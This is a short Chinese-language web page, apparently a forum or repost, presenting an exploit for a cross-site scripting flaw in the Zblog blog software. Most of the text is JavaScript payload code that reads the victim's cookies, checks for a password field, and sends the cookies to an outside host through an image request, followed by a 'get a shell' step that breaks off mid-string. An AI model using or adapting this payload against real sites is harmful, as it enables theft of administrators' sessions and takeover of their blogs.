Zblog最新跨站漏洞及利用代码
<p> Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向 <br /><br /> xmlhttp=poster(); <br /><br /> cookie=document.cookie; <br /><br /> login=cookie.indexOf(‘password’)==-1?0:1; <br /><br /> tolocation=’https://www.jb51.net/’; <br /><br /> //get cookie <br /><br /> x=new Image(); <br /><br /> x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie); <br /><br /> //get a shell <br /><br /> data=”txaContent= </p>
頁:
[1]